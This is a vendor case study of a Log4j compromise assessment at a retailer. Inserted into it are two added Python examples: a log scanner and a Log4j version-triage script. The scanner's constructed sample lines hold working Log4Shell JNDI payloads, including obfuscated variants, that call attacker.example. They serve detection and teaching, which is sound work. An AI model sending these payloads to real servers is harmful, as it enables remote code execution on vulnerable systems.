Case Study

An international retailer relies on Unit 42 to identify its Log4j exposure and risk


Compromise Assessment finds other areas of risk, helps improve cybersecurity posture.


In brief

Client

International retailer

Products and services

Unit 42® Compromise Assessment

Country

Global


Challenge

Investigate whether the client’s environment was at risk from the Log4j vulnerability.

Solution

Perform a Compromise Assessment focused on the Log4j vulnerability with coverage of general security posture.

Results

Assessment found no Log4j vulnerabilities, but identified several other critical gaps requiring improvement.


For an international retailer, maintaining world-class cybersecurity is an essential part of providing exceptional service to its customers. To achieve this goal, it invested in Palo Alto Networks products to help automate its Security Operations Center, and contracted with Palo Alto Networks Unit 42 to provide incident response services.

Through this relationship, the retailer’s security team grew to trust Unit 42’s expertise in rapidly investigating and mitigating security threats.

When the Apache Software Foundation published an alert on the Log4j vulnerability, the security team worked quickly to lock down its systems. It applied the appropriate patches and investigated whether systems had been compromised.

For increased assurance around the security of its data, the retailer asked Unit 42 to perform an in-depth Compromise Assessment of its digital estate, focused on the Log4j vulnerability.


CHALLENGES

Assess whether systems and data were compromised

The Log4j vulnerability, disclosed in early December 2021, allowed an unauthenticated remote attacker to execute arbitrary code on any system that logged attacker-controlled input through a vulnerable version of the library. Log4j is used by millions of Java applications, which made the attack surface enormous. The vulnerability received the maximum score of 10.0 on the Common Vulnerability Scoring System (CVSS), the standard for rating vulnerability severity.

After patching its systems, the retailer needed to provide its board, insurers, and other stakeholders an authoritative assessment of whether its systems and data had been compromised. It sought to determine what, if any, further steps were required to secure its network, and whether it needed to notify anyone whose personally identifiable information (PII) might have been compromised.

This investigation needed to be performed by recognized security experts who could provide the organization a comprehensive evaluation of its environment.



REQUIREMENTS

Identify and investigate vulnerable areas

The client needed to validate that its efforts to patch the Log4j vulnerability were successful, and that none of its systems had been compromised.

Its security team and Unit 42 worked together to define the scope of the investigation, and identified five major objectives:

  • Identify signs that threat actors had accessed or transferred data out of the client’s systems, especially PII, by reviewing the client’s endpoint detection and response (EDR) telemetry for evidence of unauthorized access or exfiltration.
  • Examine the client’s security information and event management (SIEM) system to identify known indicators of compromise (IOCs) associated with the Log4j vulnerability.
  • Identify the internal and external attack surfaces that could be used to exploit the Log4j vulnerability for servers deployed on-premises and in the cloud.
  • Review configuration of client’s web application firewalls (WAFs) to identify coverage for HTTP payloads known to exploit the Log4j vulnerability.
  • Measure the security of six designated external-facing sites by performing a limited web application security assessment focused on attempting to exploit the Log4j vulnerability with known payloads.
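
The SIEM and WAF objectives above come down to one piece of detection logic, and the detail that matters for both is that a literal "${jndi:" signature catches only the naive payload: the obfuscated forms in wide use within days of disclosure (nested ${lower:...} lookups, ${::-x} default-value tricks, percent-encoding) all evade it. The following is an added example, not code from the page, from Unit 42 or from the retailer. It normalizes constructed access-log lines the way Log4j's own lookup substitution would and only then matches; the log lines, IP addresses and the attacker.example hostname are made up.

```python
"""Scan HTTP access-log lines for Log4Shell (JNDI lookup) payloads.

A signature for the literal string '${jndi:' catches only the naive payload;
the common obfuscations (nested ${lower:..}, ${::-x} default-value tricks,
URL encoding) must be normalized away first. Sample lines below are constructed.
"""
import re
import urllib.parse

# Constructed access-log lines in Combined Log Format; none are real traffic.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:10:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '198.51.100.8 - - [10/Dec/2021:10:03:14 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.9 - - [10/Dec/2021:10:04:20 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://attacker.example/c}"',
    '198.51.100.10 - - [10/Dec/2021:10:05:33 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fd%7D HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
    '198.51.100.11 - - [10/Dec/2021:10:06:40 +0000] "GET /?q=${${env:NaN:-j}ndi:${env:NaN:-l}dap://attacker.example/e} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]

# What a literal-string WAF rule or SIEM search would use.
NAIVE_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)
# Applied to the normalized line; also pulls out the callback scheme and host as IOCs.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:\s*(?:([a-z]+)://([^/}\s:]+))?", re.IGNORECASE)
# An innermost ${...} lookup: one with no further ${ inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
CASE_LOOKUP = re.compile(r"^(lower|upper):(.*)$", re.IGNORECASE | re.DOTALL)


def _resolve_inner(body: str) -> str:
    """Evaluate one innermost lookup the way Log4j's substitutor would for the
    obfuscation-relevant lookups; anything else (including jndi) is left as-is."""
    case = CASE_LOOKUP.match(body)
    if case:
        return case.group(2).lower() if case.group(1).lower() == "lower" else case.group(2).upper()
    # ${key:-default}: an unresolvable key (e.g. ${::-j}, ${env:NaN:-j}) yields the default.
    if ":-" in body and not body.lower().startswith("jndi"):
        return body.split(":-", 1)[1]
    return "${" + body + "}"


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo (repeated) percent-encoding, then collapse nested lookups inside-out."""
    for _ in range(3):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        collapsed = INNER_LOOKUP.sub(lambda m: _resolve_inner(m.group(1)), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def scan_line(line: str) -> dict:
    """Match on the normalized line; record whether the literal signature would also have fired."""
    normalized = normalize(line)
    match = JNDI_PATTERN.search(normalized)
    naive_hit = NAIVE_PATTERN.search(line) is not None
    return {
        "hit": match is not None,
        "naive_hit": naive_hit,
        "obfuscated": match is not None and not naive_hit,
        "target": (match.group(1).lower(), match.group(2)) if match and match.group(1) else None,
        "normalized": normalized,
    }


def summarize(lines) -> dict:
    results = [scan_line(line) for line in lines]
    return {
        "total": len(lines),
        "naive_hits": sum(r["naive_hit"] for r in results),
        "hits": sum(r["hit"] for r in results),
        "callback_hosts": sorted({r["target"][1] for r in results if r["target"]}),
    }


if __name__ == "__main__":
    for line in SAMPLE_LOG_LINES:
        r = scan_line(line)
        print(f"hit={r['hit']!s:5} naive={r['naive_hit']!s:5} target={r['target']}")
    print(summarize(SAMPLE_LOG_LINES))
```

On the six constructed lines the literal signature fires once while the normalized match fires five times, which is exactly the gap a WAF rule set that has not been updated since the first payloads appeared would leave. The callback hosts extracted from the normalized lines are the IOCs worth pivoting on in DNS and proxy logs: a vulnerable server that actually resolved or connected to one of them is evidence of exploitation, not just of an attempt.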

SOLUTION

Compromise Assessment looks for any IOCs

Unit 42 performed a Compromise Assessment on the client’s digital estate. Unit 42’s extensive experience with incident response and threat intelligence enables it to provide security assessments informed by the general threat landscape, as well as specific threats like the Log4j vulnerability.

Using this threat-informed approach, Unit 42 can identify specific indicators of compromise, covering various vectors threat actors may use in an attack. It uses a precise, proprietary methodology to perform assessments that provide comprehensive information about a client’s environment and security posture by examining internal and external attack surfaces, threat hunting, and other techniques.


This assessment focused on the Log4j vulnerability and extended to additional potentially impacted areas.

External attack surface analysis

Using Cortex Xpanse™, Unit 42 performed a comprehensive analysis of the client’s vulnerability to attack by mapping the attack surface of approximately 4,000 domains and 120 public IP blocks. It focused on specific susceptibility to the Log4j vulnerability while also looking for other vulnerabilities in the client’s applications, certificates, and infrastructure.

While no indicators attributed to the Log4j vulnerability were identified, more than 2,000 issues were identified in other areas. Most of these related to TLS certificate problems, but the assessment also found exposed VPN devices, open Remote Desktop Protocol (RDP) ports, and application servers running vulnerable versions of software.

Threat hunting

Using Cortex XDR® and the client’s existing security tools to review forensic data for any ongoing or historical indicators of compromise, Unit 42 looked for evidence of unauthorized access to the client’s data. Investigators also used a search query to identify assets running Log4j versions susceptible to the three common vulnerabilities and exposures (CVEs) then associated with the Log4j vulnerability. This found more than 100 assets that would have been susceptible had the client’s security team not already patched them.
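
The susceptibility query above is, at bottom, a version-range check, and the part that trips people up is that the three Log4j CVEs have different fixed versions and that the Java 7 (2.12.x) and Java 6 (2.3.x) backport branches were fixed at their own version numbers. The page does not name the three CVEs or say how the query was built; the following is an added example, not Unit 42's query, and it assumes the three are CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 with the fixed versions stated in the Apache Log4j security advisories. The inventory of hosts and jar paths is constructed.

```python
"""Classify Log4j 2.x versions found in an asset inventory against the three
Log4j CVEs of December 2021 (assumed here: CVE-2021-44228, CVE-2021-45046,
CVE-2021-45105), using the fixed versions from the Apache Log4j advisories,
including the 2.12.x (Java 7) and 2.3.x (Java 6) backport branches.
The inventory below is constructed, not data from the engagement.
"""
import re

# Constructed (asset, jar path) pairs such as a file search across hosts might return.
SAMPLE_INVENTORY = [
    ("web-01", "/opt/app/lib/log4j-core-2.14.1.jar"),
    ("web-02", "/opt/app/lib/log4j-core-2.15.0.jar"),
    ("api-03", "/srv/api/WEB-INF/lib/log4j-core-2.16.0.jar"),
    ("batch-04", "/usr/share/java/log4j-core-2.12.2.jar"),
    ("batch-05", "/usr/share/java/log4j-core-2.3.jar"),
    ("legacy-06", "/usr/share/java/log4j-1.2.17.jar"),   # Log4j 1.x: out of scope for these three CVEs
    ("svc-07", "/opt/svc/lib/log4j-core-2.17.1.jar"),
    ("svc-08", "/opt/svc/lib/log4j-api-2.14.1.jar"),     # API-only jar: the JNDI lookup lives in log4j-core
]

# First affected version and first fixed version per release branch, per the Apache advisories.
ADVISORIES = {
    "CVE-2021-44228": {"first": "2.0-beta9", "fixed": {"main": "2.15.0", "2.12": "2.12.2", "2.3": "2.3.1"}},
    "CVE-2021-45046": {"first": "2.0-beta9", "fixed": {"main": "2.16.0", "2.12": "2.12.2", "2.3": "2.3.1"}},
    "CVE-2021-45105": {"first": "2.0-alpha1", "fixed": {"main": "2.17.0", "2.12": "2.12.3", "2.3": "2.3.1"}},
}

CORE_JAR = re.compile(r"log4j-core-([0-9][^/]*?)\.jar$")
PRE_RANK = {"alpha": 0, "beta": 1, "rc": 2}   # a version without a qualifier is a final release (rank 3)


def parse_version(version: str) -> tuple:
    """'2.0-beta9' -> (2, 0, 0, 1, 9); '2.14.1' -> (2, 14, 1, 3, 0). Tuples then compare correctly."""
    base, _, qualifier = version.partition("-")
    nums = [int(x) for x in base.split(".")]
    nums += [0] * (3 - len(nums))
    rank, num = 3, 0
    if qualifier:
        m = re.match(r"([a-z]*)(\d*)", qualifier.lower())
        rank = PRE_RANK.get(m.group(1), 0)   # unknown qualifiers are treated as pre-releases
        num = int(m.group(2) or 0)
    return (nums[0], nums[1], nums[2], rank, num)


def affected_cves(version: str) -> list:
    """CVEs whose affected range contains this version, honouring backport-branch fixes."""
    v = parse_version(version)
    branch = f"{v[0]}.{v[1]}"
    hits = []
    for cve, adv in ADVISORIES.items():
        fixed = adv["fixed"].get(branch, adv["fixed"]["main"])
        if parse_version(adv["first"]) <= v < parse_version(fixed):
            hits.append(cve)
    return hits


def triage(inventory) -> list:
    """Return (asset, version, cves) for every inventory entry with a susceptible log4j-core jar."""
    findings = []
    for asset, path in inventory:
        m = CORE_JAR.search(path)
        if not m:
            continue
        cves = affected_cves(m.group(1))
        if cves:
            findings.append((asset, m.group(1), cves))
    return findings


if __name__ == "__main__":
    for asset, version, cves in triage(SAMPLE_INVENTORY):
        print(f"{asset}: log4j-core {version} -> {', '.join(cves)}")
```

Two caveats a practitioner would apply before trusting the result. A file-name search misses log4j-core bundled inside fat jars, WARs and EARs under another name, so the more reliable signals are the presence of org/apache/logging/log4j/core/lookup/JndiLookup.class inside archives and the Implementation-Version in the jar manifest. And a host that is "patched" by the 2.15.0 upgrade alone still shows as susceptible to the two later CVEs, which is why the engagement checked versions rather than taking the first round of patching at face value.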

Unit 42 then performed further in-depth analysis on those assets to determine whether threat actors had performed reconnaissance, executed malicious code, established persistence, engaged in command-and-control activity, accessed credentials or data, or taken anti-forensic measures.

After extensive analysis, Unit 42 found no evidence of malicious activity or unauthorized access to sensitive data in the client’s network.

External penetration testing

Unit 42 also performed penetration testing on six of the client’s external-facing websites. Based on its threat intelligence regarding Log4j vulnerability payloads, Unit 42 created payloads to use in tests against these sites.

In addition, Unit 42 reviewed client Content Delivery Network (CDN) configurations for approximately 200 sites, endpoint data for approximately 55,000 assets, and client SIEM log data for approximately 80,000 assets on 41 data sources.


RESULTS

A roadmap to strengthening security posture

Unit 42’s investigation assured the client there had been no unauthorized access to its network or data due to the Log4j vulnerability, and no other malicious activity in the client’s environment. This result meant the client did not have to make the breach notifications that would otherwise have been legally required, which could have been costly and harmed its reputation.

The Unit 42 assessment did, however, identify significant security gaps in the client’s environment. It found thirteen critical issues in external-facing assets. It also discovered that more than ten websites lacked Web Application Firewall (WAF) policies and more than twenty had WAF rules that were more than a year out of date. Identifying these vulnerabilities enabled the client to strengthen its security posture.


After completing the assessment, Unit 42 created an executive summary for the client’s board and C-Suite leadership and an in-depth technical report for the security team. Both the security team and Unit 42 received accolades for their collaborative work.

This engagement strengthened the client’s relationship with Unit 42 and its confidence in Unit 42’s incident response capabilities. It also demonstrated that the client’s security team had effectively patched the Log4j vulnerability across the organization. Through this Compromise Assessment, Unit 42 validated the skills and effectiveness of the client’s security team and helped the client significantly improve its risk posture and visibility into its digital estate.


Substantial damage averted

The Log4j vulnerability was as severe as a vulnerability can be. While the retailer moved quickly to secure its environment, the potential for damage to its business was substantial, which drove it to bring in outside experts. A successful exploit in its environment could also have seriously affected its customers.

By engaging Unit 42 to perform a Compromise Assessment, the client gained peace of mind knowing its environment and systems were secure and hadn’t been breached. The assessment also provided important information about other vulnerable areas of its infrastructure, allowing the client to meaningfully improve its security posture. This not only strengthened the retailer’s business and systems, but also improved its ability to protect and serve its customers.

Find out more about how a Unit 42 Compromise Assessment can improve your organization’s security posture.